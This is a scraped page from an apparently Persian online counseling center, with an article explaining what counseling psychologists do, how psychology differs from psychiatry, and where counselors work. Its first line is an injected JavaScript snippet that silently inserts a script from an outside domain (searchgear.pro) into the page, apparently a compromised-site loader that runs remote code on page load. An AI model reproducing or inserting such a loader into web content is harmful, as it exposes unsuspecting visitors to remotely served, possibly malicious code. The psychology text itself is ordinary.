;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); یک روانشناسی مشاوره چه کاری را انجام می دهد؟ | مرکز مشاوره آنلاین روان‌یاری
مشاوره روانشناسی

یک روانشناسی مشاوره چه کاری را انجام می دهد؟

میزان پیشرفت خواندن شما

فهرست مطالب

یک روانشناس مشاوره چه کسی است؟

یک روانشناس مشاوره کسی است که در یک محیط درمانی یا آموزشی به شیوه ی عملی و مفید مفاهیم نظری را با آخرین پیشرفت های علمی در حوزه سلامت رفتاری تطبیق می دهد‌.

آخرین تحقیقات بالینی که به بررسی تداخل پیچیده انتقال دهنده های عصبی می پردازد نشان می دهد که آن ها برای فردی که در حال حاضر از افسردگی بالینی رنج می برد ، کاربرد کمی دارند. روانشناسان مشاوره به حوزه ی روانشناسی انسانیت آن را اهدا می کنند. بدون فعالیت این افراد دلسوز، تمام تحقیقات عصبی در جهان کاربرد عملی خود را از دست می دهند.

حوزه ی سلامت عصبی یکی از جذاب ترین حوزه های حرفه ای برای دنبال کردن در قرن بیست و یک میلادی است.‌ تحقیقات بالینی همچنان از رازهای ذهن انسان ، به ویژه در رشته روانشناسی عصبی پرده بر می دارد. بر اساس گفته های روانشناس معروف یعنی دکتر کِی ردفیلد جمیسون، دانشمندان در 25 سال گذشته درباره ی کارکرد داخلی مغز مطالب بیشتری را نسبت به 100 سال قبل کشف کرده اند.

یک روانشناس مشاوره چه کاری را انجام می دهد؟

افرادی که به دنبال کردن یک حرفه در زمینه سلامت روان علاقه دارند باید از تفاوت میان روانپزشکی و روانشناسی مطلع باشند:

  • روانپزشکی شامل دنبال کردن حرفه به عنوان یک کارور پزشکی می شود که روی تشخیص و معالجه ی اختلالات روانی تمرکز می کند. این تمرکز تخصص یافته به روانپزشکان اجازه می دهد تا علاوه بر روان درمانی ، داروهای روانگردان را نیز برای مدیریت اختلالات روانی مانند اختلال دو قطبی ، اسکیزوفرنی و افسردگی اساسی تجویز کنند.
  • از سوی دیگر شاغل بودن به عنوان یک روانشناس از الگوی پزشکی روانپزشکی تبعیت نمی کند. روانشناسان نمی توانند دارو تجویز کنند اما هنوز هم می توانند برای کسانی که نیاز به مراقبت روانی دارند یک درمان کاملا تخصصی را فراهم کنند.

حوزه بهداشت روان حتی بیشتر به روانشناسی مشاوره و روانشناسی بالینی انشعاب می یابد. هر دو این مشاغل حرفه ای در بسیاری از مکان ها مانند محیط کار با یکدیگر همپوشانی دارند ، اما به طور کلی روانشناسان بالینی با افرادی که دارای مشکلات بیشتری هستند کار می کنند. روانشناسان مشاوره با تمرکز بیشتر روی رویکرد توسعه ای، دسترسی عمومی تری به حوزه ی بهداشت روان دارند.

در واقع روانشناسان مشاوره خدمات درمانی را هم ارائه می دهند ، اما اصطلاح “درمان شناس” یک اصطلاح گسترده است. درمان شناسان همانند روانشناسان بالینی می توانند روانشناس مشاوره هم باشند و در شرایط خاص، یک مددکار اجتماعی هم می تواند نقش درمان شناس را ایفا کند.

روانشناسان مشاوره در فعالیت های بیشتری از درمان شناسی مانند درس یا ارائه دادن خدمات مشاوره درون سازمان های حرفه ای دخالت می کنند. آنها ممکن است در توسعه و تحقیقات شغلی نیز کمک کنند. همچنین ، پیشرفت شغلی در گرو روانشناسی مشاوره است.

محل کار یک روانشناس مشاوره چگونه به نظر می رسد؟

روانشناسان مشاوره می توانند در یک محل تمرین خصوصی ، یک مرکز سرپایی یا یک بیمارستان فعالیت کنند. محل کار یک روانشناس مشاوره به نوع مشتریانی که یک شاغل تصمیم می گیرد تا به آن ها کمک کند بستگی دارد. برای مثال، کالج ها و دانشگاه های مهم روانشناسان مشاوره را استخدام می کنند تا علاوه بر هدایت تحقیقات همراه با روانشناسان بالینی، تدریس انجام دهند.

  روان‌درمانگر خوب کیست و چه ویژگی‌هایی دارد؟

امکان دارد کسب و کار ها و شرکت ها نیز روانشناسان مشاوره را برای خدمات مشاوره استخدام کنند. همچنین مراکز سلامت عمومی، روانشناسان مشاوره را استخدام می کنند تا روی هماهنگی حرفه ای خدمات مرکز نظارت کنند تا در نتیجه روان درمانی مربوط به گروه را هماهنگ کنند‌.

برای کسب اطلاعات بیشتر مطلب مشاوره روانشناسی چیست؟ را بخوانید

Rate this post

توجه داشته باشید که این مطلب، جایگزین نظرات و توصیه‌های تخصصی پزشکان نیست و هرگز از این مطلب به‌عنوان جایگزین توصیه پزشکان استفاده نکنید.

جهت جلب رضايت و اعتماد شما دوست عزيز و اثبات تخصص و دانش و به جهت تصميم گيري صحيح شما در انتخاب مشاور خود، ميتوانيد يك تا دو جلسه مشاوره آنلاين رايگان از ما دريافت كنيد، كافيست روي دكمه درخواست مشاوره رايگان در همين صفحه كليك نماييد.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

مرکز مشاوره آنلاین روان‌یاری

جهت رزرو یک جلسه مشاوره رایگان فرم زیر را تکمیل بفرمایید.